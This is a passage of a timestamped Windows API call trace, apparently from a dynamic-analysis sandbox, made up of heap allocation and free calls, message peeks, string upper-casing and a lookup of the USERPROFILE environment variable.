RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0151.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0151.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0151.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0151.187] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0151.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0151.187] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0151.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0151.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72208 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0151.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0151.188] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0151.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0151.188] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0151.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0151.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0151.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0151.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0151.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0151.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0151.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0151.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0151.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0151.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0151.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0151.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0151.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0151.190] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0151.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0151.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0151.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0151.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0151.190] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0151.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0151.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0151.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0151.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0151.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0151.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0151.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0151.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0151.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0151.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0151.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0151.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0151.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0151.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721f8 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0151.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0151.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0151.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0151.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0151.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0151.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0151.192] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0151.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0151.192] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0151.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0151.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0151.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0151.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0151.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0151.193] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0151.193] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0151.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0151.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0151.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0151.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0151.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0151.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0151.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0151.194] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0151.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0151.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0151.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0151.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0151.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0151.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0151.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0151.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0151.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0151.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) 